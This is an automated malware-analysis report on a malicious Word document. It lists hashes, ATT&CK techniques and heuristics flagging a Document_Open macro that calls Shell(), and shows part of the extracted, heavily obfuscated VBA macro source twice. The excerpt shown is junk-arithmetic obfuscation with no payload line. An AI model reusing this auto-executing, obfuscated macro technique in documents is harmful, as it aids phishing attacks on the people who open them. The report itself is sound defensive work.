Office (OLE) malware analysis — malicious · a74e0bed123083bd

MALICIOUS

Office (OLE)

176.4 KB Created: 2018-07-20 15:29:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 9e7ad7c4829d53da112eeb283a1840f4 SHA-1: c230f67b1f6298156866d9998d17e9729147d337 SHA-256: a74e0bed123083bd6e371ee54ede7f43cafa3acab3315f6a88307e43d3171cab

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a Document_Open macro that utilizes the Shell() function. This indicates an intent to execute arbitrary code, most likely to download and run a secondary payload. The VBA macro code is heavily obfuscated, preventing a more detailed analysis of its specific actions.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42066 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	42066 bytes
SHA-256: `6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oCorzdV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function uDlRlVhivZIL() On Error Resume Next If zKFjJm >= HOQzu Then qBiKo = 183388958 + 155564576 ElseIf qaRpn < LvwQY Then For bBUCl = 96 To 3879 OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX) Next bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz) End If If bdiwEO >= wjGuoT Then jOmTzT = 183388958 + 155564576 ElseIf onUfmz < pNRfCr Then For frOAR = 96 To 3879 wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU) Next wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH) End If If dllWNG >= TBpdc Then YriaD = 183388958 + 155564576 ElseIf NjjtsF < YwoLFt Then For YhkJH = 96 To 3879 saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC) Next nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz) End If If lMwjN >= JXWlY Then KMVmm = 183388958 + 155564576 ElseIf EXWvzi < MfCEE Then For tCwMcz = 96 To 3879 PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop) Next VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB) End If If Rjjfst >= cnXuZJ Then DPDfZ = 183388958 + 155564576 ElseIf WFztn < PTzUU Then For FYiiw = 96 To 3879 WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw) Next iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj) End If End Function Private Function NKIlIUbQzwV() On Error Resume Next If HsSLR >= Gbimp Then QJSTqd = 183388958 + 155564576 ElseIf VBfGw < zVujS Then For dOFRE = 96 To 3879 iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH) Next zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH) End If If uwvmz >= WlmHf Then lGULbn = 183388958 + 155564576 ElseIf DIjpZ < oWHMfY Then For cOpwDF = 96 To 3879 oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW) Next RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA) End If If iwuAiH >= NiQlma Then tkOTdl = 183388958 + 155564576 ElseIf cEJpQ < swdFpU Then For VHpZD = 96 To 3879 npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT) Next jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY) End If If pCarz >= SUCoai Then dKwvG = 183388958 + 155564576 ElseIf SRLIi < piXBw Then For OqRcMt = 96 To 3879 lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj) Next urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo) End If If mcLcM >= GIMdfX Then JqqpMm = 183388958 + 155564576 ElseIf jVRnr < DkRKj Then For FHUsCz = 96 To 3879 RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf) Next OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL) End If End Function Private Function ZNBZsodYhlDmfZ() On Error Resume Next If wtJqK >= ZjHSpE Then boHjv = 183388958 + 155564576 ElseIf icWOsw < PHFSZb Then For cIvzt = 96 To 3879 Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw) Next nLatZu = hajQu / QjBckT + 1126 ... (truncated)

SHA-256: 6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function uDlRlVhivZIL()
On Error Resume Next
   If zKFjJm >= HOQzu Then
      qBiKo = 183388958 + 155564576
      ElseIf qaRpn < LvwQY Then
      For bBUCl = 96 To 3879
         OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
      Next
      bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
   End If
   If bdiwEO >= wjGuoT Then
      jOmTzT = 183388958 + 155564576
      ElseIf onUfmz < pNRfCr Then
      For frOAR = 96 To 3879
         wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
      Next
      wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
   End If
   If dllWNG >= TBpdc Then
      YriaD = 183388958 + 155564576
      ElseIf NjjtsF < YwoLFt Then
      For YhkJH = 96 To 3879
         saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
      Next
      nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
   End If
   If lMwjN >= JXWlY Then
      KMVmm = 183388958 + 155564576
      ElseIf EXWvzi < MfCEE Then
      For tCwMcz = 96 To 3879
         PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
      Next
      VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
   End If
   If Rjjfst >= cnXuZJ Then
      DPDfZ = 183388958 + 155564576
      ElseIf WFztn < PTzUU Then
      For FYiiw = 96 To 3879
         WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
      Next
      iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
   End If
End Function
Private Function NKIlIUbQzwV()
On Error Resume Next
   If HsSLR >= Gbimp Then
      QJSTqd = 183388958 + 155564576
      ElseIf VBfGw < zVujS Then
      For dOFRE = 96 To 3879
         iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
      Next
      zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
   End If
   If uwvmz >= WlmHf Then
      lGULbn = 183388958 + 155564576
      ElseIf DIjpZ < oWHMfY Then
      For cOpwDF = 96 To 3879
         oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
      Next
      RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
   End If
   If iwuAiH >= NiQlma Then
      tkOTdl = 183388958 + 155564576
      ElseIf cEJpQ < swdFpU Then
      For VHpZD = 96 To 3879
         npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
      Next
      jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
   End If
   If pCarz >= SUCoai Then
      dKwvG = 183388958 + 155564576
      ElseIf SRLIi < piXBw Then
      For OqRcMt = 96 To 3879
         lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
      Next
      urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
   End If
   If mcLcM >= GIMdfX Then
      JqqpMm = 183388958 + 155564576
      ElseIf jVRnr < DkRKj Then
      For FHUsCz = 96 To 3879
         RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
      Next
      OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
   End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
   If wtJqK >= ZjHSpE Then
      boHjv = 183388958 + 155564576
      ElseIf icWOsw < PHFSZb Then
      For cIvzt = 96 To 3879
         Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
      Next
      nLatZu = hajQu / QjBckT + 1126
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.